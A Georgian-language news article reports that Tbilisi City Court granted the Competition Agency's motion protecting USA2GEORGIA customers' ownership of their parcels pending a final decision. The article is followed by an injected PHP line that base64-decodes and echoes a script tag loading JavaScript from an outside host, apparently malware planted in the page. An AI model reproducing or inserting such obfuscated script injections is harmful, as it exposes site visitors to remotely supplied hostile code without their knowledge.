celsiusi
ავერსი საქკაბელი
საქართველოს კონკურენციის ეროვნული სააგენტოს შუამდგომლობა USA2GEORGIA-ს საქმეზე თბილისის საქალაქო სასამართლომ დააკმაყოფილა. კერძოდ, სააგენტოს ინფორმაციით, საბოლოო გადაწყვეტილების მიღებამდე თითოეული მომხმარებელი დაცულია ამანათ(ებ)ზე საკუთრების უფლების დაკარგვისგან.
„სააგენტოს მიერ განხორციელებული ქმედების შედეგად, თუკი მომხმარებელი 30 დღეში საქართველოს საწყობში შენახვის ღირებულებას არ გადაიხდის და ამანათს არ გაიტანს, მასზე ავტომატურად საკუთრების უფლებას არ დაკარგავს.
USA2GEORGIA-ს მიერ მომხმარებლის უფლებების შესახებ საქართველოს კანონის შესაძლო დარღვევის თაობაზე სააგენტოს საბოლოო გადაწყვეტილების მიღებამდე, კომპანიას აეკრძალა ამანათში არსებული პროდუქციის გასხვისება ან მისი საკუთრებაში დატოვება“, – აღნიშნულია კონკურენციის სააგენტოს ინფორმაციაში.
კონკურენციის ეროვნულ სააგენტოში აცხადებენ, რომ უწყება აღნიშნულ საქმეზე საბოლოო გადაწყვეტილებას 2023 წლის იანვრის ბოლომდე გამოაქვეყნებს.
„16 იანვრის მდგომარეობით, სააგენტოში შემოსულია 107 განაცხადი, შესწავლა მიმდინარეობს 58 საქმეზე. პირობითი ვალდებულება მომხმარებლის სასარგებლოდ 9 მოვაჭრესთან გაფორმდა, რაც გულისხმობს, რომ მოვაჭრემ აიღო ვალდებულება საქმიანობის შიდა პოლიტიკა შეცვალოს და იმ მომხმარებელთა უფლებები აღადგინოს, რომელთაც, სავარაუდოდ, წარსულში მისი სავაჭრო პოლიტიკის შედეგად ზიანი მიადგათ“, – აცხადებენ სააგენტოში.
კონკურენციის ეროვნულმა სააგენტომ USA2GEORGIA-ს მიერ მომხმარებლის უფლებების შესაძლო დარღვევის ფაქტზე საქმის შესწავლა გასული წლის დეკემბერში დაიწყო.
289
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");